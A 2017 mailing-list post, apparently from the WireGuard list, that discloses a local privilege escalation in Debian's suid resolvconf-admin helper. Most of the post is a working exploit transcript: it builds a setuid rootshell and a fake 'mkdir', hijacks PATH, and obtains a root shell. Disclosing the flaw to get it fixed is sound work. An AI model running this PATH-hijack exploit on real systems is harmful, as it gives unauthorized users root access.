Fixing wg-quick's DNS= directive with a hatchet

Jason A. Donenfeld Jason at
Sun Oct 29 23:06:31 CET 2017

On Sat, Oct 28, 2017 at 4:35 PM, Daniel Kahn Gillmor
<dkg at> wrote:
> I actually shipped the resolvconf-admin package in debian to provide
> some kind of filtering interface to avoid total garbage from the network
> getting accidentally passed through to arbitrary resolvconf plugins.

By the way, the program you wrote introduces a trivial local privilege
escalation vulnerability into Debian, since not all available
providers of the resolvconf binary set PATH themselves. Always clear
environment variables yourself before exec'ing anything in an suid
executable. Here's an exploit:

unpriv at scw-968260:~$ id
uid=1000(unpriv) gid=1000(unpriv) groups=1000(unpriv),114(resolvconf-admins)

unpriv at scw-968260:~$ stat /usr/bin/resolvconf-admin
  File: /usr/bin/resolvconf-admin
  Size: 24736           Blocks: 56         IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 2897743     Links: 1
Access: (4754/-rwsr-xr--)  Uid: (    0/    root)   Gid: (
Access: 2017-10-29 21:56:25.709185001 +0000
Modify: 2017-10-29 21:55:04.529185001 +0000
Change: 2017-10-29 21:55:41.449185001 +0000
 Birth: -

unpriv at scw-968260:~$ echo 'main() { setuid(0); setgid(0);
execl("/bin/sh", 0); }' > a.c && gcc -o rootshell a.c

unpriv at scw-968260:~$ echo "main() { chown(\"$PWD/rootshell\", 0, 0);
chmod(\"$PWD/rootshell\", 04755); }" > a.c && gcc -o mkdir a.c

unpriv at scw-968260:~$ export PATH="$PWD:$PATH"

unpriv at scw-968260:~$ resolvconf-admin add eth0
Cannot write to /run/resolvconf/lock

unpriv at scw-968260:~$ ./rootshell
# id
uid=0(root) gid=0(root) groups=0(root),114(resolvconf-admins),1000(unpriv)

More information about the WireGuard mailing list